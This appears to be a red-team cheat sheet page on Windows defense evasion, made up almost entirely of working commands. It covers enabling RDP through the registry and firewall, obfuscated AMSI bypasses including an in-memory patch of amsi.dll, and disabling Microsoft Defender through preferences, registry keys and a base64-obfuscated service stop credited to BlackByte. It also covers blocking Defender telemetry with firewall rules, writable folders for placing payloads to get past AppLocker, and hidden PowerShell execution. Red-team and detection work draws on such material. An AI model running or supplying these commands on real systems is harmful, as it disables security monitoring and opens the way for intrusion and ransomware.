# Defense Evasion

## Firewall Modification

### Allowing RDP

PowerShell

{% code overflow="wrap" %}

```powershell
Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```

{% endcode %}

Windows Commands

{% code overflow="wrap" %}

```powershell
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall set rule group="remote administration" new enable="yes"
netsh advfirewall firewall set rule group="remote administration" new enable=yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=domain
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=private
netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh firewall set service RemoteDesktop enable
netsh firewall set service RemoteDesktop enable profile=ALL
netsh firewall set service RemoteAdmin enable
sc config TermService start= auto
net start Termservice
```

{% endcode %}

## AMSI Bypasses

A classic resource: <https://amsi.fail/>

{% code overflow="wrap" %}

```powershell
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
SeT-Item ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( TYpE ) ; ( Get-varIABLE ( ('1Q'+'2U') +'zX' ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."getfiElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sETVaLUE"( ${nULl},${tRuE} );
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
$fzxhw = @" using System; using System.Runtime.InteropServices; public class fzxhw { [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr vilqbn, uint flNewProtect, out uint lpflOldProtect); } "@
Add-Type $fzxhw
$jvdnuxs = [fzxhw]::LoadLibrary("$(('ämsî'+'.dll').NORMALiZE(chAr+ChaR+ChAr+CHar+cHar) -replace ChAr+ChAR+cHAR+ChaR+chAr+CHar)") $ikbtnz = [fzxhw]::GetProcAddress($jvdnuxs, "$(cHAR+Char+chaR+cHAr+ChAr+Char+cHaR+chAR+chAr+cHAr+CHar+cHaR+CHaR+CHar)") $p = 0 [fzxhw]::VirtualProtect($ikbtnz, [uint32]5, 0x40, [ref]$p) $ovsj = "0xB8" $zahw = "0x57" $cfuu = "0x00" $ukxu = "0x07" $salu = "0x80" $yrkl = "0xC3" $xrnun = [Byte[]] ($ovsj,$zahw,$cfuu,$ukxu,+$salu,+$yrkl) [System.Runtime.InteropServices.Marshal]::Copy($xrnun, 0, $ikbtnz, 6)
```

{% endcode %}

## Microsoft Defender for Endpoint

Note: Events are cached on the system, so as soon as traffic is established again, the floodgates will open.

### Getting Current Status

{% code overflow="wrap" %}

```powershell
Get-MpComputerStatus
```

{% endcode %}

### Adding an Exclusion

{% code overflow="wrap" %}

```powershell
Add-MpPreference -ExclusionPath 'C:\windows\temp'
```

{% endcode %}

### Scanning a File with Defender

{% code overflow="wrap" %}

```powershell
C:\Program Files\Windows Defender\MpCmdRun.exe -Scan -ScanType 3 -DisableRemediation -File 'C:\stager.exe'
```

{% endcode %}

### Disabling Defender

{% code overflow="wrap" %}

```powershell
taskkill  /F /IM MSASCuiL.exe

Set-MpPreference -DisableIntrusionPreventionSystem $true `
-DisableRealtimeMonitoring $true -DisableScriptScanning $true `
-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode `
-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t REG_DWORD /d 0x1 /f
REG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 0x1 /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 0x2 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v "NotificationSuppress" /t REG_DWORD /d 0x1 /f
```

{% endcode %}

### Disable Defender on Reboot\\

A BlackByte TTP

{% code overflow="wrap" %}

```powershell
powershell -command "$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARA B'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x"
```

{% endcode %}

### Reviewing AppLocker Policies

{% code overflow="wrap" %}

```powershell
$a = Get-ApplockerPolicy -effective; $a.rulecollections;
```

{% endcode %}

You can also review the AppLocker policies by enumerating the Registry manually:

{% code overflow="wrap" %}

```powershell
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
reg query "HKEY_LOCAL_Machine\Software\Policies\Microsoft\Windows\SrpV2" /s
```

{% endcode %}

### Blocking MS Defender Connections

```powershell
New-NetFirewallRule -DisplayName "Block 443 MsMpEng" -Name "Block 443 MsMpEng" -Direction Outbound -Service WinDefend -Enabled True -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 SenseCncProxy" -Name "Block 443 SenseCncProxy" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 MsSense" -Name "Block 443 MsSense" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" -RemotePort 443 -Protocol TCP -Action Block
```

### **Default Writable Folders for Execution Control Bypass**

Try putting your payload in one of the following directories:

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
<strong>C:\Windows\Tasks
</strong>C:\windows\tracing 
</code></pre>

## PowerShell Execution

### Nested PowerShell Bypass

{% code overflow="wrap" %}

```powershell
powershell.exe -enc [BASE64THIS(powershell.exe -w hidden -c "iex(...)"]>
```

{% endcode %}

### **32-Bit PowerShell Bypass**

PowerShell disabled for you? Try running the 32-bit copy of it:

{% code overflow="wrap" %}

```sh
C:\windows\syswow64\windowspowershell\v1.0\powershell whoami
```

{% endcode %}